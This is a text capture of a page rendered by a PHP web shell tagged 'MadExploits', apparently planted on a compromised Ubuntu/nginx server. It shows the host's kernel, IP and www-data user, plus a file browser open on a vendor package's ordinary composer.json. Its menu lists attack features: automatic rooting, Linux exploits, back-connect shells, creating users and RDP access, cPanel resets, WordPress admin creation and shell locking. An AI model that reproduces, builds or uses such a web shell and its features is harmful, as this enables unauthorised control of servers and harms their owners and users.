Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core /
vendor /
php-http /
discovery /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxrwxr-x
CHANGELOG.md
5.84
KB
-rw-rw-r--
LICENSE
1.06
KB
-rw-rw-r--
README.md
1.5
KB
-rw-rw-r--
composer.json
1.35
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "php-http/discovery", "description": "Finds installed HTTPlug implementations and PSR-7 message factories", "license": "MIT", "keywords": ["http", "discovery", "client", "adapter", "message", "factory", "psr7"], "homepage": "http://php-http.org", "authors": [ { "name": "Márk Sági-Kazár", "email": "mark.sagikazar@gmail.com" } ], "require": { "php": "^7.1 || ^8.0" }, "require-dev": { "graham-campbell/phpspec-skip-example-extension": "^5.0", "php-http/httplug": "^1.0 || ^2.0", "php-http/message-factory": "^1.0", "phpspec/phpspec": "^5.1 || ^6.1", "puli/composer-plugin": "1.0.0-beta10" }, "suggest": { "php-http/message": "Allow to use Guzzle, Diactoros or Slim Framework factories" }, "autoload": { "psr-4": { "Http\\Discovery\\": "src/" } }, "autoload-dev": { "psr-4": { "spec\\Http\\Discovery\\": "spec/" } }, "scripts": { "test": "vendor/bin/phpspec run", "test-ci": "vendor/bin/phpspec run -c phpspec.ci.yml" }, "extra": { "branch-alias": { "dev-master": "1.9-dev" } }, "conflict": { "nyholm/psr7": "<1.0" }, "prefer-stable": true, "minimum-stability": "beta" }
Close